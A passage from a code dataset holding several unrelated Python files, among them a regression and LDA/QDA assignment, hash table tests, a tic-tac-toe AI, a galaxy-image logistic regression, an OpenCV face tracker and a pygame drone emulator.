regularization parameter\n # lambda\n\n # IMPLEMENT THIS METHOD\n w = np.mat(w)\n w = w.T\n wt_x = np.dot(X, w)\n error = (np.dot((y - wt_x).T, (y - wt_x))) / (2) + (lambd * np.dot(w.T, w) / 2)\n term1 = np.dot(w.T, X.T) - y.T\n # print (\"term1\", term1.shape)\n lambda1 = lambd * w.T\n gradient_des = np.dot(term1, X) + lambda1\n error_grad = np.array(gradient_des).flatten()\n return error, error_grad\n\n\ndef mapNonLinear(x, p):\n # Inputs:\n # x - a single column vector (N x 1)\n # p - integer (>= 0)\n # Outputs:\n # Xd - (N x (d+1))\n # IMPLEMENT THIS METHOD\n Xd = np.zeros([x.shape[0], p + 1])\n for i in range(x.shape[0]):\n for j in range(p + 1):\n Xd[i][j] = np.power(x[i], j)\n return Xd\n\n\n# Main script\n\n# Problem 1\n# load the sample data\nif sys.version_info.major == 2:\n X, y, Xtest, ytest = pickle.load(open('sample.pickle', 'rb'))\nelse:\n X, y, Xtest, ytest = pickle.load(open('sample.pickle', 'rb'), encoding='latin1')\n\n# LDA\nmeans, covmat = ldaLearn(X, y)\nldaacc = ldaTest(means, covmat, Xtest, ytest)\nprint('LDA Accuracy = ' + str(ldaacc))\n# QDA\nmeans, covmats = qdaLearn(X, y)\nqdaacc = qdaTest(means, covmats, Xtest, ytest)\nprint('QDA Accuracy = ' + str(qdaacc))\n\n# plotting boundaries\nx1 = np.linspace(-5, 20, 100)\nx2 = np.linspace(-5, 20, 100)\nxx1, xx2 = np.meshgrid(x1, x2)\nxx = np.zeros((x1.shape[0] * x2.shape[0], 2))\nxx[:, 0] = xx1.ravel()\nxx[:, 1] = xx2.ravel()\n\nzacc, zldares = ldaTest(means, covmat, xx, np.zeros((xx.shape[0], 1)))\nplt.contourf(x1, x2, zldares.reshape((x1.shape[0], x2.shape[0])))\nplt.scatter(Xtest[:, 0], Xtest[:, 1], c=ytest)\nplt.show()\n\nzacc, zqdares = qdaTest(means, covmats, xx, np.zeros((xx.shape[0], 1)))\nplt.contourf(x1, x2, zqdares.reshape((x1.shape[0], x2.shape[0])))\nplt.scatter(Xtest[:, 0], Xtest[:, 1], c=ytest)\nplt.show()\n# Problem 2\n\nif sys.version_info.major == 2:\n X, y, Xtest, ytest = pickle.load(open('diabetes.pickle', 'rb'))\nelse:\n X, y, Xtest, ytest = pickle.load(open('diabetes.pickle', 'rb'), encoding='latin1')\n\n# add intercept\nX_i = np.concatenate((np.ones((X.shape[0], 1)), X), axis=1)\nXtest_i = np.concatenate((np.ones((Xtest.shape[0], 1)), Xtest), axis=1)\n\nw = learnOLERegression(X, y)\nmle = testOLERegression(w, Xtest, ytest)\n# mle = testOLERegression(w, X, y)\nw_i = learnOLERegression(X_i, y)\nmle_i = testOLERegression(w_i, Xtest_i, ytest)\n# mle_i = testOLERegression(w_i, X_i, y)\n\nprint('RMSE without intercept ' + str(mle))\nprint('RMSE with intercept ' + str(mle_i))\n\n# Problem 3\nk = 101\nlambdas = np.linspace(0, 1, num=k)\ni = 0\nrmses3 = np.zeros((k, 1))\nfor lambd in lambdas:\n w_l = learnRidgeRegression(X_i, y, lambd)\n rmses3[i] = testOLERegression(w_l, Xtest_i, ytest)\n # rmses3[i] = testOLERegression(w_l, X_i, y)\n i = i + 1\nplt.plot(lambdas, rmses3)\nplt.show()\n# Problem 4\nk = 101\nlambdas = np.linspace(0, 1, num=k)\ni = 0\nrmses4 = np.zeros((k, 1))\nopts = {'maxiter': 100} # Preferred value.\nw_init = np.ones((X_i.shape[1], 1))\nfor lambd in lambdas:\n args = (X_i, y, lambd)\n w_l = minimize(regressionObjVal, w_init, jac=True, args=args, method='CG', options=opts)\n w_l = np.transpose(np.array(w_l.x))\n w_l = np.reshape(w_l, [len(w_l), 1])\n rmses4[i] = testOLERegression(w_l, Xtest_i, ytest)\n # rmses4[i] = testOLERegression(w_l, X_i, y)\n i = i + 1\nplt.plot(lambdas, rmses4)\nplt.show()\n\n# Problem 5\npmax = 7\nlambda_opt = lambdas[np.argmin(rmses4)]\nrmses5 = np.zeros((pmax, 2))\nfor p in range(pmax):\n Xd = mapNonLinear(X[:, 2], p)\n Xdtest = mapNonLinear(Xtest[:, 2], p)\n w_d1 
= learnRidgeRegression(Xd, y, 0)\n rmses5[p, 0] = testOLERegression(w_d1, Xdtest, ytest)\n w_d2 = learnRidgeRegression(Xd, y, lambda_opt)\n rmses5[p, 1] = testOLERegression(w_d2, Xdtest, ytest)\nplt.plot(range(pmax), rmses5)\nplt.legend(('No Regularization', 'Regularization'))\nplt.show()\n","sub_path":"script2.py","file_name":"script2.py","file_ext":"py","file_size_in_byte":9505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"163475602","text":"from hash_table import HashTable\nimport pytest\n\n\n@pytest.fixture(scope='function')\ndef _small():\n h = HashTable()\n h.set('batman', 'batman')\n h.set('robin', 'robin')\n return h\n\n\ndef test_one(_small):\n x = _small\n assert x.get('batman') == 'batman'\n assert x.get('batman') != 'robin'\n\n\n# def test_dict():\n# x = HashTable()\n# with open(\"/usr/share/dict/words\", \"r\") as afile:\n# for word in afile:\n# word.strip()\n# if not word:\n# break\n# x.set(word, word)\n# assert x.get(word) == word\n\n\ndef test_ordval():\n x = HashTable()\n x.set('this is a really big sentence to break it',\n 'this is a really big sentence to break it')\n assert x.get('this is a really big sentence to break it') == 'this is a really big sentence to break it'\n\n'''Write test that inputs identical keys, with different values\n And check size. To make sure that it doens't just overwrite it.'''\n\n\ndef test_identical():\n x = HashTable()\n x.set('vortex', 'vortex')\n x.set('peter', 'peter')\n x.set('vortex', 'vortex')\n assert x.get('vortex') == 'vortex' \n","sub_path":"test_hash.py","file_name":"test_hash.py","file_ext":"py","file_size_in_byte":1147,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"186657576","text":"\r\nfrom player import Player\r\nimport copy\r\nimport random\r\nimport math\r\n\r\nclass AI(Player):\r\n def __init__(self, name, symbol):\r\n #Borrows parent co-efficients\r\n Player.__init__(self, name, symbol)\r\n #initilise intelligence co-efficients\r\n self.co1 = 24\r\n self.co2 = 16\r\n self.co3 = 7\r\n self.co4 = 10\r\n self.co5 = 10\r\n if self.symbol == 'X':\r\n self.opponent = 'O'\r\n else:\r\n self.opponent = 'X'\r\n\r\n def turn(self, game):\r\n #intilise variables\r\n self.position_type = {}\r\n self.position_points = {}\r\n self.points_tally = {}\r\n for i in range(1,game.length**2+1):\r\n self.position_type[i] = [0,0]\r\n self.position_points[i] = [0,0,0] #[attack,defend,neutral]\r\n self.points_tally[i] = 0\r\n #thinks about all possible moves, adding points for all squares\r\n\r\n self.count_points(game)\r\n #decides the best turn and makes it\r\n for position in range(1,game.length**2+1):\r\n #check special condition - attacking from corners is especially good if piece in \r\n if game.length == 3:\r\n if set([2,4,6,8]).issubset(game.remaining) and position in [1,3,7,9]:\r\n #defending on corners is especially bad if enemy controls other corners\r\n if self.symbol not in [game.board[0][0], game.board[0][2], game.board[2][0], game.board[2][2]]\\\r\n and self.opponent in [game.board[0][0], game.board[0][2], game.board[2][0], game.board[2][2]]:\r\n self.position_points[position][1] /= 8 \r\n #defending corner forks on corners is especially bad\r\n\r\n\r\n #Compute all other points through the elementwise vector multiplication\r\n self.points_tally[position] += self.position_points[position][0]*((self.position_type[position][0]**2))\\\r\n + self.position_points[position][1]*((self.position_type[position][1]**2))\r\n 
\r\n highest_val = 0\r\n highest_pos = 0\r\n\r\n for key in self.points_tally:\r\n if self.points_tally[key] > highest_val:\r\n highest_val = self.points_tally[key]\r\n highest_pos = key\r\n\r\n if highest_pos == 0:\r\n highest_pos = game.remaining[0]\r\n\r\n\r\n self.replace(game, game.position_dict[highest_pos])\r\n game.remaining.remove(highest_pos)\r\n \r\n\r\n def count_points(self, game):\r\n if self.symbol == 'O':\r\n index = 1\r\n else:\r\n index = 0\r\n #counts the points in each row, column and diagonal\r\n checklist = []\r\n \r\n for i in range(1, game.length+1):\r\n checklist.append(game.pos_in_row(i))\r\n checklist.append(game.pos_in_col(i))\r\n checklist.append(game.pos_in_dia(0))\r\n checklist.append(game.pos_in_dia(1))\r\n\r\n for major_row in checklist:\r\n for row in major_row:\r\n row_tally = game.count_row(row)\r\n if len(game.remaining) == game.length**2 and game.length == 3:\r\n self.points_tally[1] += 1000000000\r\n \r\n for position in row:\r\n if position in game.remaining:\r\n \r\n #condition 0.1: Imminent victory\r\n if row_tally[self.symbol] == game.win_con-1 and row_tally[self.opponent] == 0 and game.learning == 0:\r\n self.points_tally[position] += 1000000000**2\r\n elif row_tally[self.symbol] == game.win_con-2 and row_tally[self.opponent] == 0 and game.learning == 0:\r\n self.points_tally[position] += 10000000**2\r\n\r\n #condition 0.2: Imminent defeat\r\n elif row_tally[self.opponent] == game.win_con-1 and row_tally[self.symbol] == 0 and game.learning == 0:\r\n self.points_tally[position] += 100000000**2\r\n elif row_tally[self.opponent] == game.win_con-2 and row_tally[self.symbol] == 0 and game.learning == 0:\r\n self.points_tally[position] += 1000000**2\r\n\r\n\r\n #condition 2: blank row\r\n elif row_tally[self.symbol] + row_tally[self.opponent] == 0:\r\n self.points_tally[position] += self.co1\r\n \r\n\r\n #condition 1: Attacking row\r\n elif row_tally[self.opponent] == 0:\r\n self.position_type[position][int(math.fabs(index-1))] += 1 \r\n self.position_points[position][int(math.fabs(index-1))] += self.co2+row_tally[self.symbol]*self.co4\r\n \r\n \r\n\r\n #condition 3: Defending row\r\n elif row_tally[self.symbol] == 0:\r\n self.position_type[position][index] += 1\r\n self.position_points[position][index] += self.co3+row_tally[self.opponent]*self.co5\r\n \r\n def switch(self, other):\r\n self.co1 = copy.copy(other.co1)\r\n self.co2 = copy.copy(other.co2)\r\n self.co3 = copy.copy(other.co3)\r\n self.co4 = copy.copy(other.co4)\r\n self.co5 = copy.copy(other.co5)\r\n\r\n","sub_path":"ai.py","file_name":"ai.py","file_ext":"py","file_size_in_byte":5485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"383657107","text":"hand = str(input(\"Enter hand: \")).upper()\nscore = 0\n\naces = 0\nfor card in hand:\n if card in [\"T\", \"J\", \"Q\", \"K\"]:\n score += 10\n continue\n if card == \"A\":\n aces += 1\n continue\n score += int(card)\n\nfor x in range(aces):\n if score+11 <= 21:\n score += 11\n else:\n score += 1\n\nprint(score)\n","sub_path":"Python/Lab 5/blackjack.py","file_name":"blackjack.py","file_ext":"py","file_size_in_byte":341,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"591381002","text":"import sys\nimport json\nfrom pyspark import SparkContext\n\n\ndef collect_output_data(sc):\n data = sc.textFile(sys.argv[1]).map(lambda row: json.loads(row)).map(lambda row: row['retweet_count'])\n output_json['mean_retweet'] = data.mean()\n 
output_json['max_retweet'] = data.max()\n output_json['stdev_retweet'] = data.stdev()\n\n\ndef dump_output_data():\n with open(sys.argv[2], 'wt', encoding='utf-8') as file:\n json.dump(output_json, file, indent=1, ensure_ascii=False)\n\n\ndef main():\n sc = SparkContext(\"local[*]\", \"DS 553 HW1\")\n sc.setLogLevel('OFF') # Limits the output to be printed\n\n # start = time() # Starts the timer to see the response time\n collect_output_data(sc)\n # print(f'Elapsed Time: {time() - start}') # Prints the time taken to finish task 1\n\n dump_output_data()\n\n sc.stop()\n\n\nif __name__ == '__main__':\n if len(sys.argv) != 3:\n print(\"Incorrect number of command line arguments passed\")\n print(\"Usage: python firstname_lastname_task2.py input_file_path output_file_path\")\n exit(1)\n output_json = {}\n main()\n","sub_path":"HW1/vishal_kallem_task2.py","file_name":"vishal_kallem_task2.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"345738372","text":"############################################\n# #\n# LOGISTIC REGRESSION FOR SPIRAL GALAXIES #\n# #\n############################################\n\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.utils import check_random_state\nimport seaborn as sns\nfrom sklearn import metrics\n\nprint(__doc__)\n\n# Turn down for faster convergence\nt0 = time.time()\ntrain_size = 0.8\ntest_size = 0.2\nprint(\"Training fraction: {}\\n\".format(train_size))\n\n### load galaxy data from spiral_images/ \nX_in = np.load('spiral_images/images1.npy')\ny = np.load('spiral_images/bin_labels.npy')\nchunk = 4\nimgsInChunk = X_in.shape[0]\nprint(\"Processing chunk {} containing {} pictures...\\n\".format(chunk, imgsInChunk))\n\nimgStart = chunk * imgsInChunk\nimgEnd = imgStart + imgsInChunk\ny = y[imgStart : imgEnd]\n\n# for shuffling data in a reproducable manner\nrandom_state = 1\n\n# pick training and test data sets \nX_train_in, X_test_in, y_train, y_test = train_test_split(X_in,y,train_size=train_size,test_size\n =test_size, random_state = random_state)\n\n# We need to split the uploaded X_in arrays into the galaxy ID vector and the image data\nid_train = X_train_in[:,0]\nX_train = X_train_in[:,1:]\nid_test = X_test_in[:,0]\nX_test = X_test_in[:,1:]\nprint(\"The training data has {} samples of {} features each. 
\\n\".format(X_train.shape[0], X_train.shape[1]))\n\n# scale data to have zero mean and unit variance [required by regressor]\nscaler = StandardScaler()\nX_train = scaler.fit_transform(X_train)\nX_test = scaler.transform(X_test)\n\n# apply logistic regressor with 'sag' solver, C is the inverse regularization strength\nclf = LogisticRegression(C=1e5,\n multi_class='multinomial',\n penalty='l2', solver='sag', tol=0.1)\n# fit data\nclf.fit(X_train, y_train)\n# percentage of nonzero weights\nsparsity = np.mean(clf.coef_ == 0) * 100\n# compute accuracy\nscore = clf.score(X_test, y_test)\n\n#display run time\nrun_time = time.time() - t0\nprint('Example run in %.3f s' % run_time)\n\nprint(\"Sparsity with L2 penalty: %.2f%%\" % sparsity)\nprint(\"Test score with L2 penalty: %.4f\" % score)\n\n\n#######################################################################################################\n\npredictions = clf.predict(X_test)\n\n\n# plot weights vs the pixel position\ncoef = clf.coef_.copy()\nplt.figure(figsize=(10, 5))\nscale = np.abs(coef).max()\nfor i in range(1):\n l2_plot = plt.subplot(1,1,i+1)\n im = l2_plot.imshow(coef[i].reshape(45, 45), interpolation='nearest',\n cmap=plt.cm.Greys, vmin=-scale, vmax=scale)\n l2_plot.set_xticks(())\n l2_plot.set_yticks(())\n cbar = plt.colorbar(im)\nplt.suptitle('classification weights for spiral pattern')\n\nplt.show()\n\n# plot confusion matrix\ncm = metrics.confusion_matrix(y_test, predictions)\nprint(cm)\n\n# first alternative\nplt.figure(figsize=(9,9))\nplt.imshow(cm, interpolation='nearest', cmap='Pastel1')\nplt.title('Confusion matrix', size = 20)\nplt.colorbar()\ntick_marks = np.arange(2)\nplt.xticks(tick_marks, [\"spiral\", \"no spiral\"], size = 12)\nplt.yticks(tick_marks, [\"spiral\", \"no spiral\"], size = 12)\nplt.tight_layout()\nplt.ylabel('Actual label', size = 18)\nplt.xlabel('Predicted label', size = 18)\nwidth, height = cm.shape\nfor x in range(width):\n for y in range(height):\n plt.annotate(str(cm[x][y]), xy=(y, x), \n horizontalalignment='center',\n verticalalignment='center')\n \n# second alternative\nplt.figure(figsize=(9,9))\nsns.heatmap(cm, annot=True, fmt=\".0f\", linewidths=.5, square = True, cmap = 'Blues_r');\nplt.ylabel('Actual label');\nplt.xlabel('Predicted label');\nall_sample_title = 'Accuracy Score: {0}'.format(score)\nplt.title(all_sample_title, size = 20);\n \n# Plotting misclassified pictures\nindex = 0\nmisclassifiedIndexes = []\nfor label, predict in zip(y_test, predictions):\n if label != predict: \n misclassifiedIndexes.append(index)\n index +=1\n\nplt.figure(figsize=(20,4))\nfor plotIndex, badIndex in enumerate(misclassifiedIndexes[0:3]):\n plt.subplot(1, 3, plotIndex + 1)\n plt.imshow(np.reshape(X_test[badIndex], (45, 45)), cmap=plt.cm.gray)\n plt.title('Predicted: {}, Actual: {}'.format(predictions[badIndex], y_test[badIndex]), fontsize = 15) \n\n","sub_path":"logreg_spiral.py","file_name":"logreg_spiral.py","file_ext":"py","file_size_in_byte":4506,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"200795163","text":"\n\"\"\"\ncreate an interactive bokeh app to demo a linked subplot array\n\"\"\"\n\nimport numpy as np\nfrom bokeh.plotting import output_file, figure, show\nfrom bokeh.layouts import gridplot, row, column, layout\nfrom pyrb.bokeh import linkfigs\n\n# define data and method for creating a list of bokeh figures\nsamples = 300\nfreq = 2\ntime = np.linspace(0, 1, samples)\ndata = {}\ndata['sin'] = np.sin(2 * np.pi * freq * time)\ndata['cos'] 
= np.cos(2 * np.pi * freq * time)\ndata['sin-squared'] = np.sin(2 * np.pi * freq * time) ** 2\ndata['cos-squared'] = np.cos(2 * np.pi * freq * time) ** 2\ndef make_figs():\n figs = []\n for trig in data.keys():\n title = '{}, f = {}Hz, fs = {}Hz'.format(trig, freq, samples)\n figs.append(figure(title=title))\n figs[-1].circle(time, data[trig])\n figs[-1].line(time, data[trig])\n return figs\n\n# create a linked subplot array using a column layout\n# figs = make_figs()\n# linkfigs(figs, axis='xy')\n# output_file('column layout.html')\n# show(column(figs, sizing_mode='stretch_both'))\n\n# create a linked subplot array using the other column layout\n# from pyrb.bokeh import column\n# figs = make_figs()\n# linkfigs(figs, axis='xy')\n# output_file('other column layout.html')\n# show(column(figs, sizing_mode='stretch_both', toolbar_location='right'))\n\n# create a linked subplot array using a gridplot layout\nfigs = make_figs()\nlinkfigs(figs, axis='xy')\noutput_file('gridplot layout.html')\nshow(gridplot(figs, ncols=1, sizing_mode='stretch_both', toolbar_location='right'))\n","sub_path":"bokeh/linked.py","file_name":"linked.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"627254830","text":"\n\nfrom swarm import Swarm\n\ndef test_get_closest_particle():\n positions = ([\n [3,0,0],\n [4,0,0],\n ])\n\n velocities = ([\n [2,0,0],\n [0,0,0],\n ])\n\n accelerations = ([\n [-1,0,0],\n [-2,0,0],\n ])\n\n s = Swarm(positions, velocities, accelerations)\n\n s.run(10)\n\n assert s.getClosestParticleIndex() == 0\n","sub_path":"20/test_part1.py","file_name":"test_part1.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"295801713","text":"import cv2\r\nimport sys\r\nimport numpy as np\r\nfrom math import sin, cos, radians\r\nfrom time import sleep\r\n############################ Set up our static variables ############################\r\n\r\n# Open filepaths for cascades\r\nclassifier_pth = '/home/pi/Downloads/opencv-master/data/haarcascades/'\r\neyes_cascade = cv2.CascadeClassifier(''.join([classifier_pth, 'haarcascade_eye.xml']))\r\nface_cascade = cv2.CascadeClassifier(''.join([classifier_pth, 'haarcascade_frontalface_default.xml']))\r\nprof_cascade = cv2.CascadeClassifier(''.join([classifier_pth, 'haarcascade_profileface.xml']))\r\n\r\n# Set colors for each cascade\r\neyes_clr = (255, 0, 0)\r\nface_clr = (0, 0, 0)\r\nprof_clr = (255, 255, 255)\r\nbox_line_width = 2 # Thickness for boxes that highlight our features\r\n\r\n# Custom processing settings for each cascade\r\neyes_settings = {\r\n 'scaleFactor': 20, \r\n 'minNeighbors': 3, # Discriminate a bit more strongly on what is an eye\r\n 'minSize': (10, 10) # Allow for eyes to be smaller than other features\r\n }\r\n\r\nface_settings = {\r\n 'scaleFactor': 1.1, \r\n 'minNeighbors': 3, \r\n 'minSize': (20, 20)\r\n }\r\n\r\nprof_settings = {\r\n 'scaleFactor': 1.1, \r\n 'minNeighbors': 5, \r\n 'minSize': (20, 20)\r\n }\r\n\r\n\r\n# Other things\r\nangs2scan = [25, -25] # Angles we want to scan through if we don't find anything @ 0 degrees\r\n\r\n# TODO: Stuff to highlight whether or not we're in/our of bounds\r\n# bound_coords = [1,2,3,4] # Some list of coordinates to define the limits for when we move the camera\r\n# coord_list_len = 10 # Length of our list to store our coordinates; this will help prevent spurious movements\r\n# in_clr = (0, 255, 0) \r\n# 
out_clr = (0, 0, 255) \r\n\r\n\r\n############################ Define our helper functions ############################\r\n# Function to rotate our images\r\ndef rotate_image(image, angle):\r\n if angle == 0: return image\r\n height, width = image.shape[:2]\r\n rot_mat = cv2.getRotationMatrix2D((width/2, height/2), angle, 0.9)\r\n result = cv2.warpAffine(image, rot_mat, (width, height), flags=cv2.INTER_LINEAR)\r\n return result\r\n\r\n# Function to rotate any detected features back to original frame of reference\r\ndef rotate_point(pos, img, angle):\r\n if angle == 0: return pos\r\n \r\n # Iterate through all of the highlighted features and translate the coordinates\r\n for k in range( np.shape(pos)[0] ):\r\n \r\n x = pos[k,0] - img.shape[1]*0.4\r\n y = pos[k,1] - img.shape[0]*0.4\r\n newx = x*cos(radians(angle)) + y*sin(radians(angle)) + img.shape[1]*0.4\r\n newy = -x*sin(radians(angle)) + y*cos(radians(angle)) + img.shape[0]*0.4\r\n \r\n pos[k, :] = np.array([int(newx), int(newy), pos[k,2], pos[k,3]])\r\n \r\n return pos\r\n\r\n\r\n# Function to use a haars cascade and find features\r\n# TODO: We'll want to store our coordinates for output at some later point...\r\ndef find_feature(cascade, box_clr, settings, gray, frame, angle):\r\n feature = cascade.detectMultiScale(gray, **settings)\r\n \r\n # Draw a rectangle around the features\r\n if len(feature) > 0:\r\n # Flag that we found something\r\n feature_found = True \r\n \r\n # Rotate our boxes based off of the original frame dimensions if-needed\r\n feature = rotate_point(feature, frame, -angle)\r\n \r\n # Draw the box\r\n for (x, y, w, h) in feature:\r\n cv2.rectangle(frame, (x, y), (x+w, y+h), box_clr, box_line_width)\r\n else:\r\n # Flag that we didn't find anything\r\n feature_found = False\r\n \r\n return frame, feature_found, feature\r\n\r\n\r\n# Other functions as-needed\r\n# Function to check if our coordinated are within bounds or if we need to move\r\n# def within_bounds(coord_list, bounds)\r\n # We could either look at the moving average with a window that's of length N:\r\n # https://stackoverflow.com/questions/14313510/how-to-calculate-rolling-moving-average-using-numpy-scipy\r\n # or perhaps we want to just check if the mean/median of the list coordinates\r\n # is within bounds; we'll probably need to do some experimentation to see what works best\r\n \r\n # loop through each feature\r\n # check to see that the feature is within our bounding box\r\n # return True, 0 if we're within bounds, return false, amount to move if oob\r\n # return True\r\n \r\n# Function to move our motors if we're out of bounds\r\n#def motor_movement(parameters):\r\n #calculate distance needed to move by motor\r\n #convert to radians/measure\r\n #return values to be read by servos\r\n \r\n\r\n############################ Do the main loop ############################\r\n\r\n# Open a connection to the webcam \r\nvideo_capture = cv2.VideoCapture(0)\r\n\r\n# Main loop; this runs forever now, but we can tie it to a hardware switch that\r\n# will make it stop\r\nwhile True: \r\n # Pull a frame from the camera && convert to grayscale\r\n ret, frame = video_capture.read()\r\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n\r\n # IMPORTANT! We ONLY want to call find_feature if we haven't found anything\r\n # so that we minimize the amount of processing. 
We can determine later if\r\n    # we still want to process multiple cascades for better error checking/\r\n    # redundancy down the road.\r\n    \r\n    # Look for faces\r\n    angle = 0\r\n    found = False\r\n    frame, found, coords = find_feature(face_cascade, face_clr, face_settings, gray, frame, angle)\r\n    if not(found):\r\n        # If we didn't find anything without rotating our frames, let's \r\n        # check for face profiles\r\n        frame, found, coords = find_feature(prof_cascade, prof_clr, prof_settings, gray, frame, angle)\r\n        \r\n        if not(found):\r\n            # If we STILL didn't find anything, let's continue to search\r\n            # first for regular faces, then face profiles at each angle. \r\n            # We begin by rotating the image, then checking each cascade.\r\n            for angle in angs2scan:\r\n                # print(angle) # for debugging to make sure that we break the\r\n                # loop as soon as we find a feature\r\n                gray_rot = rotate_image(gray, angle)\r\n                \r\n                # Check rotated image for faces\r\n                frame, found, coords = find_feature(face_cascade, face_clr, face_settings, gray_rot, frame, angle)\r\n                if found:\r\n                    # If we found something, we can break the FOR loop so\r\n                    # that we don't need to perform the other rotations/scans\r\n                    break\r\n                else:\r\n                    # Check the rotated image for profiles\r\n                    frame, found, coords = find_feature(prof_cascade, prof_clr, prof_settings, gray_rot, frame, angle)\r\n                    if found: break\r\n    \r\n    \r\n    # If we still haven't found anything, let's check for eyes\r\n    if not(found):\r\n        angle = 0\r\n        frame, found, coords = find_feature(eyes_cascade, eyes_clr, eyes_settings, gray, frame, angle)\r\n    \r\n    # TODO: Finally, check if we're within bounds and move if needed...\r\n    # 1. Collapse our list into the typical value (probably the mean or median of the list),\r\n    # add it into a queue of coordinates\r\n    # 2. Add the collapsed coordinates to a queue or something like that\r\n    # 3. Check if we're within bounds\r\n    # 4. If within bounds, add a green boundary box, otherwise add a red \r\n    # boundary box and reset our queue. We'll eventually replace \r\n    # these boxes with our motor_movement() and/or other function(s)\r\n    \r\n    \r\n    # Display our detected features (this is only for our debugging at this point)\r\n    cv2.imshow('Video', frame)\r\n    if cv2.waitKey(1) & 0xFF == ord('q'):\r\n        break\r\n    \r\n# Closing\r\nvideo_capture.release()\r\ncv2.destroyAllWindows()\r\n","sub_path":"Haar/SPOILER_tracker_pseudo_code_fleshed_v0.py","file_name":"SPOILER_tracker_pseudo_code_fleshed_v0.py","file_ext":"py","file_size_in_byte":7805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"55436894","text":"from random import randrange\n\nbody = 0\nwhile body < 21:\n    print(\"Máš\", body, \"bodů\")\n    odpoved = input(\"Přeješ si otočit kartu? \")\n    if odpoved == \"ano\":\n        karta = randrange(2, 11)\n        print(\"Otočil jsi kartu s hodnotou\", karta)\n        body = body + karta\n    elif odpoved == \"ne\":\n        break\n    else:\n        print(\"Nerozumím použij odpovědi: ano / ne\")\n\n\nif body == 21:\n    print(\"Gratuluji! Vyhráváš!\")\n\nelif body > 21:\n    print(\"Smůla! 
Prohrál jsi.\")\n\nelse:\n print(\"Škoda chybělo ti\", 21 - body, \"bodů do 21 bodů!\")","sub_path":"03/OkoBere.py","file_name":"OkoBere.py","file_ext":"py","file_size_in_byte":563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"499652657","text":"import os\n\n#homepath = \"/home/icaro\"\nhomepath = \"/home/grellert\"\n\npathin = \"%s/testesHEVC/out/0919\"%homepath\nout = open(\"%s/testesHEVC/hm0919.csv\"%homepath,\"w\")\n\nout6t = open(\"%s/testesHEVC/hm6t0919.csv\"%homepath,\"w\")\nout4t = open(\"%s/testesHEVC/hm4t0919.csv\"%homepath,\"w\")\nout2t = open(\"%s/testesHEVC/hm2t0919.csv\"%homepath,\"w\")\n\nyuvs = sorted(os.listdir(\"%s\"%pathin))\n\nlinha = \"YUV,Bitrate,Y-PSNR,U-PSNR,V-PSNR,YUV-PSNR,Time\"\nprint >> out, linha\nprint >> out4t, linha\nprint >> out2t, linha\nprint >> out6t, linha\n\nfor yuv in yuvs:\n\tif \"bin\" in yuv:\n\t\tcontinue\n\tfile = open(\"%s/%s\"%(pathin,yuv),\"r\")\n\tlines = file.readlines()\n\tline = lines[-5]\n\ta,time = line.split(\":\")\n\tt,s = time.split(\"s\")\n\tt = t.strip(\" \")\n\tline = lines[-25]\n\tf,r = line.split(\"a\")\n\tr = r.strip(\" \")\n\tbr,yp,up,vp,yuvp = r.split(\" \")\n\tyuvp = yuvp[:-1]\n\n\tlinha = \"%s,%s,%s,%s,%s,%s,%s\"%(yuv,br,yp,up,vp,yuvp,t)\n\n\tif \"4taps\" in yuv:\n\t\tprint >> out4t, linha\n\telif \"6taps\" in yuv:\n\t\tprint >> out6t, linha\n\telif \"2taps\" in yuv:\n\t\tprint >> out2t, linha\n\telse:\n\t\tprint >> out, linha\n\n\tout.close\n\tout2t.close\n\tout4t.close\n\tout6t.close\n","sub_path":"parser/parser_hm_taps.py","file_name":"parser_hm_taps.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"219891361","text":"import pygame\r\nimport copy\r\nimport sys\r\nimport math\r\nimport logging\r\nimport controler\r\nimport time\r\nimport numpy as np\r\nimport threading\r\nfrom dataclasses import dataclass\r\n\r\nclass Drone:\r\n space_config = {\r\n 'x_min': -60.0,\r\n 'x_max': 60.0,\r\n 'y_min': -10.0,\r\n 'y_max': 60.0,\r\n }\r\n def __init__(self, image,frameconfig): \r\n self.image = image\r\n self.__base_image=image\r\n self.angle = 0\r\n self.frameconfig=frameconfig\r\n self.space_config=Drone.space_config\r\n # [x,y] vector\r\n self.posByCenter(0,0)\r\n \r\n def translate(self,x_speed,y_speed):\r\n x_speed,y_speed = self.__transformEmulatedToRealVel(x_speed,y_speed)\r\n self.pos = self.pos.move(x_speed, y_speed)\r\n if self.pos.right > self.frameconfig['width']:\r\n self.pos.right = self.frameconfig['width']\r\n if self.pos.bottom > self.frameconfig['height']:\r\n self.pos.bottom = self.frameconfig['height']\r\n if self.pos.left < 0:\r\n self.pos.left = 0\r\n if self.pos.top < 0:\r\n self.pos.top = 0\r\n \r\n def posByCenter(self,x_pos,y_pos):\r\n x_pos,y_pos=self.__transformEmulatedToRealCoord(x_pos,y_pos)\r\n self.image.get_rect().center=(x_pos,y_pos)\r\n self.pos=self.image.get_rect()\r\n self.pos.center=(x_pos,y_pos)\r\n\r\n def set_rotation(self,angle):\r\n x,y=self.pos.center\r\n self.angle=angle\r\n self.image=pygame.transform.rotate(self.__base_image,self.angle)\r\n x_pos,y_pos= self.__transformRealToEmulatedCoord(x,y)\r\n self.posByCenter(x_pos,y_pos)\r\n\r\n def 